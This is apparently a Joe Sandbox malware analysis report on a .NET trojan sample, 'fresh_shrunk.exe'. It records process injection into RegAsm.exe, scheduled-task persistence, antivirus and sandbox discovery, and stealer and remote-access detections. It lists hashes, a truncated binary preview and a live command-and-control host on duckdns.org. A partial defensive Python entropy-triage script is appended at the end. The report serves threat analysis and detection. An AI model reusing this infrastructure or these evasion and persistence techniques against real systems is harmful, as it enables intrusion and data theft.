Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe ; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe ; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe ; Queries volume information: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe ; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe ; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe ; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe ; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: RegAsm.exe, 00000001.00000002.4139366985.00000000063D0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.4135013411.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp ; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe ; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

Source: Yara match ; File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 0.2.fresh_shrunk.exe.287683c.0.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 9.2.bddddsx.exe.2fd0628.0.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 0.2.fresh_shrunk.exe.288057c.1.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 9.2.bddddsx.exe.2fc68e8.1.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match ; File source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match ; File source: 00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match ; File source: 00000001.00000002.4136838151.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match ; File source: Process Memory Space: fresh_shrunk.exe PID: 6860, type: MEMORYSTR
Source: Yara match ; File source: Process Memory Space: RegAsm.exe PID: 6948, type: MEMORYSTR
Source: Yara match ; File source: Process Memory Space: bddddsx.exe PID: 3192, type: MEMORYSTR
Source: Yara match ; File source: Process Memory Space: RegAsm.exe PID: 6616, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match ; File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 0.2.fresh_shrunk.exe.287683c.0.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 9.2.bddddsx.exe.2fd0628.0.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 0.2.fresh_shrunk.exe.288057c.1.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 9.2.bddddsx.exe.2fc68e8.1.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 0.2.fresh_shrunk.exe.288057c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 9.2.bddddsx.exe.2fd0628.0.raw.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 0.2.fresh_shrunk.exe.287683c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 9.2.bddddsx.exe.2fc68e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match ; File source: 0000000A.00000002.1720132463.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match ; File source: 00000000.00000002.1677750236.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match ; File source: 00000009.00000002.1695358036.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match ; File source: 00000001.00000002.4136838151.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match ; File source: Process Memory Space: fresh_shrunk.exe PID: 6860, type: MEMORYSTR
Source: Yara match ; File source: Process Memory Space: RegAsm.exe PID: 6948, type: MEMORYSTR
Source: Yara match ; File source: Process Memory Space: bddddsx.exe PID: 3192, type: MEMORYSTR
Source: Yara match ; File source: Process Memory Space: RegAsm.exe PID: 6616, type: MEMORYSTR

MITRE ATT&CK Matrix

The number in parentheses after a technique is the count of matching signatures in this report; techniques without a number were not observed.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure
Initial Access: Valid Accounts (1), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
Execution: Windows Management Instrumentation (131), Scheduled Task/Job (1), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell
Persistence: Valid Accounts (1), Scheduled Task/Job (1), DLL Side-Loading (1), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Privilege Escalation: Valid Accounts (1), Access Token Manipulation (1), Process Injection (311), Scheduled Task/Job (1), DLL Side-Loading (1), RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Defense Evasion: Masquerading (1), Valid Accounts (1), Access Token Manipulation (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (141), Process Injection (311), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (22), DLL Side-Loading (1)
Credential Access: Input Capture (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
Discovery: Security Software Discovery (231), Process Discovery (1), Virtualization/Sandbox Evasion (141), Application Window Discovery (1), System Information Discovery (24), Wi-Fi Discovery, Remote System Discovery, System Owner/User Discovery, Network Sniffing, Network Service Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot
Collection: Input Capture (1), Archive Collected Data (11), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
Command and Control: Encrypted Channel (1), Non-Standard Port (1), Non-Application Layer Protocol (1), Application Layer Protocol (21), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement
Behavior Graph (ID: 1429324, Sample: fresh_shrunk.exe, Startdate: 21/04/2024, Architecture: WINDOWS, Score: 100)

• Network: vbdsg.duckdns.org (57.128.155.22, local port 49730 to remote port 8896, ATGS-MMD-ASUS, Belgium); Uses dynamic DNS services
• Top-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
• fresh_shrunk.exe: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
  • RegAsm.exe: connects to vbdsg.duckdns.org; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
  • cmd.exe: Uses schtasks.exe or at.exe to add and modify task schedules; starts conhost.exe
  • cmd.exe: drops C:\Users\user\AppData\Local\...\bddddsx.exe (PE32); starts conhost.exe
  • cmd.exe: starts conhost.exe and schtasks.exe
• bddddsx.exe: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  • cmd.exe: starts conhost.exe and schtasks.exe
  • cmd.exe: starts conhost.exe
  • cmd.exe: starts conhost.exe
  • RegAsm.exe

Source | Detection | Scanner | Label
fresh_shrunk.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.Seraph
fresh_shrunk.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe | 55% | ReversingLabs | ByteCode-MSIL.Trojan.Seraph
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
vbdsg.duckdns.org | 57.128.155.22 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
vbdsg.duckdns.org | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegAsm.exe, 00000001.00000002.4136838151.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
57.128.155.22 | vbdsg.duckdns.org | Belgium | 2686 | ATGS-MMD-ASUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1429324
Start date and time: 2024-04-21 23:22:03 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: fresh_shrunk.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@28/5@1/1
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 52
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 40.127.169.103, 72.21.81.240, 20.242.39.171, 20.3.187.198
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Execution Graph export aborted for target RegAsm.exe, PID 6616 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• VT rate limit hit for: fresh_shrunk.exe
Time | Type | Description
22:22:56 | Task Scheduler | Run new task: Nano path: "C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe"
23:23:06 | API Interceptor | 9480295x Sleep call for process: RegAsm.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
57.128.155.22 | 8QpxBYQvg1.exe | malicious | PureLog Stealer |
57.128.155.22 | file.exe | malicious | Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz |
57.128.155.22 | file.exe | malicious | Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz |
57.128.155.22 | file.exe | malicious | RedLine |
57.128.155.22 | CHZlSQKW3X.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, zgRAT |
57.128.155.22 | IkYqsQV4ty.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz |
57.128.155.22 | 51lz9Xlo4S.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz |
57.128.155.22 | AkJ6Em8xAv.exe | malicious | Glupteba, LummaC Stealer, Raccoon Stealer v2, RedLine, SmokeLoader, zgRAT |
57.128.155.22 | vxBrm6K24y.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, zgRAT |
57.128.155.22 | file.exe | malicious | RedLine |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
vbdsg.duckdns.org | INVOICE#BUSAPOMKDS03.lnk | malicious | AsyncRAT, Metasploit, VenomRAT, XWorm | 154.30.255.175
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ATGS-MMD-ASUS | b3astmode.arm7.elf | malicious | Mirai | 57.171.100.63
ATGS-MMD-ASUS | b3astmode.x86.elf | malicious | Unknown | 48.189.85.168
ATGS-MMD-ASUS | qHaDdrhGKL.elf | malicious | Mirai | 34.17.28.164
ATGS-MMD-ASUS | dugw41p62T.elf | malicious | Mirai | 34.39.186.15
ATGS-MMD-ASUS | FE8sC55u4j.elf | malicious | Mirai | 32.202.32.116
ATGS-MMD-ASUS | w2wnAQTd6O.elf | malicious | Unknown | 48.13.8.19
ATGS-MMD-ASUS | Y98pGn3FUt.elf | malicious | Mirai | 195.75.249.254
ATGS-MMD-ASUS | tajma.arm7-20240421-1029.elf | malicious | Mirai, Okiru | 57.238.135.17
ATGS-MMD-ASUS | http://134.213.29.14:82/grep.x86_64 | malicious | IPRoyal Pawns | 34.160.144.191
ATGS-MMD-ASUS | FFE Order details - Cincy v41720.xlsx | malicious | Unknown | 34.36.216.150
                                        No context
                                        No context
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):323
                                        Entropy (8bit):5.363435887027673
                                        Encrypted:false
                                        SSDEEP:6:Q3La/xwcz92W+P12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hz92n4M9tDLI4MWuPTAv
                                        MD5:A92E44C0313DAFEC1988D0D379E41A2F
                                        SHA1:C2F5644C418A81C1FB40F74298FF39D1420BFAC0
                                        SHA-256:F3F3E681BE07C36042639B1679ACF8B2D23BE037713D5E395C48006840DBE77A
                                        SHA-512:4F32FE6F35FC6EB4D4CF41EDEDE3C6B3FDFE31E58DA6FC7B301B1EBD3FBEEE64681C928B45E87CD556A1D32D32CB5932764EAB22FFEE11E42B8D5EB0DCFDC22C
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                        Process:C:\Users\user\AppData\Local\Temp\bddddsx\bddddsx.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):737
                                        Entropy (8bit):5.352753964755418
                                        Encrypted:false
                                        SSDEEP:12:Q3La/KDLI4MWuPTAWzAbDLI4MNldKZarkvoDLI4MWuCOKbbDLI4MWuPJKAVKhav:ML9E4KjsXE4qdKqE4KnKDE4KhKiKhk
                                        MD5:DA7EF1B9630A3E6C3B70892390887AF9
                                        SHA1:6EF2D6E0ADFC00EF044509BD3AA1A22791B968FA
                                        SHA-256:82B646ADAC247AF19A3994984FA089EEB9DD71405062D3CE971735D51F0E95AD
                                        SHA-512:AF6CD48959D6705FC5B9EC82DBF1BDB9D585141A2CE9A57E45B579D257AC8C8781D1F88F5855EC14ED707EF30D98C8AD9C6382C9DF5F0A69FD12BEC86A3DE128
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                        Process:C:\Users\user\Desktop\fresh_shrunk.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):737
                                        Entropy (8bit):5.352753964755418
                                        Encrypted:false
                                        SSDEEP:12:Q3La/KDLI4MWuPTAWzAbDLI4MNldKZarkvoDLI4MWuCOKbbDLI4MWuPJKAVKhav:ML9E4KjsXE4qdKqE4KnKDE4KhKiKhk
                                        MD5:DA7EF1B9630A3E6C3B70892390887AF9
                                        SHA1:6EF2D6E0ADFC00EF044509BD3AA1A22791B968FA
                                        SHA-256:82B646ADAC247AF19A3994984FA089EEB9DD71405062D3CE971735D51F0E95AD
                                        SHA-512:AF6CD48959D6705FC5B9EC82DBF1BDB9D585141A2CE9A57E45B579D257AC8C8781D1F88F5855EC14ED707EF30D98C8AD9C6382C9DF5F0A69FD12BEC86A3DE128
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):167936
                                        Entropy (8bit):4.978749761301541
                                        Encrypted:false
                                        SSDEEP:1536:fJZhM+Qw6/iPxFPP3t/zzdnr8EI5jayp3z3hXdmd30RrSkbiKyhz5u36UU5eX9Mk:++SrvbvyZg6UU529cI1VoheH
                                        MD5:745A24A4347A0BB2B9C5E1BA5B2DADEB
                                        SHA1:E89EECDF3BD5A8F34B8933986567CFDA2401E17A
                                        SHA-256:AD5C027ED298920CD09CEFBFCB08BFF9B5B55EE1F411BA59F6D1E77677E3BB5C
                                        SHA-512:6E5226E348C37DED536177495F5D6697AB4034FD12433A069BD9B9EECE5585853E921AAF76BA68A92FF349147BC1272D9156EDE8EC6C1DBBFA6D16A659EBCAFF
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 55%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%..e.................6...P.......U... ...`....@.. ....................................@.................................aU..J....`...L........................................................................... ............... ..H............text....5... ...6.................. ..`.rsrc....L...`...N...8..............@..@.reloc..............................@..B.................U......H.......\X...b......<......}............................................0.......... .O......+Y8^...#S...:]\@+Y.-.~7...~.... ....+H+M~:...~9...+H+I+N.-.~<...~;...+F(....(.....-..-..,.*st...8.....8.....+.(....+.(....+..+.(....+.(....+..+......(u...*b.....+.+.*(K...+.(....+.....0...........8....8.....8....~>...8.......9....&&&&~>...8......8....~7...~.... ....8....8......+d.........~.... )...(......... ......~.... 6...(.......~@.....(.....B....~7...~C....(....(......X.-...~E....
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):4.978749761301541
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:fresh_shrunk.exe
                                        File size:167'936 bytes
                                        MD5:745a24a4347a0bb2b9c5e1ba5b2dadeb
                                        SHA1:e89eecdf3bd5a8f34b8933986567cfda2401e17a
                                        SHA256:ad5c027ed298920cd09cefbfcb08bff9b5b55ee1f411ba59f6d1e77677e3bb5c
                                        SHA512:6e5226e348c37ded536177495f5d6697ab4034fd12433a069bd9b9eece5585853e921aaf76ba68a92ff349147bc1272d9156ede8ec6c1dbbfa6d16a659ebcaff
                                        SSDEEP:1536:fJZhM+Qw6/iPxFPP3t/zzdnr8EI5jayp3z3hXdmd30RrSkbiKyhz5u36UU5eX9Mk:++SrvbvyZg6UU529cI1VoheH
                                        TLSH:FCF35BBE37558E33E94909B088994154832DBD469E83DF1774893F28BF717C92A1BACC
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%..e.................6...P.......U... ...`....@.. ....................................@................................
                                        Icon Hash:1ff3b0b0b0b0331e
                                        Entrypoint:0x4155ab
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x65F3EA25 [Fri Mar 15 06:26:45 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]    ; 0x402000 = Imagebase 0x400000 + IAT RVA 0x2000, i.e. the file's single import, mscoree.dll!_CorExeMain: the standard native entry stub of a .NET executable
add byte ptr [eax], al       ; repeated 97 times: the disassembler decoding the 00 00 padding that follows the stub, not code that runs
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x15561 | 0x4a | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x14cdd | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2c000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x135b1 | 0x13600 | 1c302f8e97dbfa18502b35bf1beae8c9 | False | 0.7181577620967742 | data | 7.228149219206704 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x16000 | 0x14cdd | 0x14e00 | 3e2b82f432db956a89421325885fba87 | False | 0.0578686377245509 | data | 1.9011718204172392 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2c000 | 0xc | 0x200 | 33e042c05234517b70c8d592d6567816 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x16084 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m | English | United States | 0.03228143854252928
RT_ICON | 0x268d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.08360995850622406
RT_ICON | 0x28e9c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.12312382739212008
RT_ICON | 0x29f68 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.25975177304964536
RT_GROUP_ICON | 0x2a420 | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x2a49a | 0x420 | data | English | United States | 0.3693181818181818
RT_MANIFEST | 0x2a8f6 | 0x3e7 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (939), with CRLF line terminators | English | United States | 0.5145145145145145
DLL | Import
mscoree.dll | _CorExeMain
Language of compilation system | Country where language is spoken
English | United States
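Two of the static facts above are the ones a triage script should reproduce for any sample: the .text section has entropy 7.23, far above what plain CIL code usually shows and consistent with the unpacker and string-decryption signatures, and a non-zero IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (the CLR header, here at RVA 0x2008) marks the file as a managed executable. The script below is an added example, not Joe Sandbox's code and not part of the report: a minimal PE32/PE32+ section parser written against the Python standard library that computes per-section entropy on the same 0-8 bits-per-byte scale as the report and flags executable sections above a threshold. Because the sample itself is not reproduced on this page, the block includes its own builder for a structurally valid but non-runnable PE image as a constructed test input; the 7.0 threshold and the section names and flags in the test image are assumptions.

```python
import math
import struct

CLR_DIRECTORY = 14              # index of IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR in the data directories
IMAGE_SCN_MEM_EXECUTE = 0x20000000
ENTROPY_THRESHOLD = 7.0         # assumption: unobfuscated CIL .text sections sit well below this


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform); the scale of the report's Entropy column."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe_sections(blob: bytes):
    """DOS header -> PE signature -> COFF header -> optional header -> section table.
    Returns (sections, has_clr_header)."""
    if blob[:2] != b"MZ":
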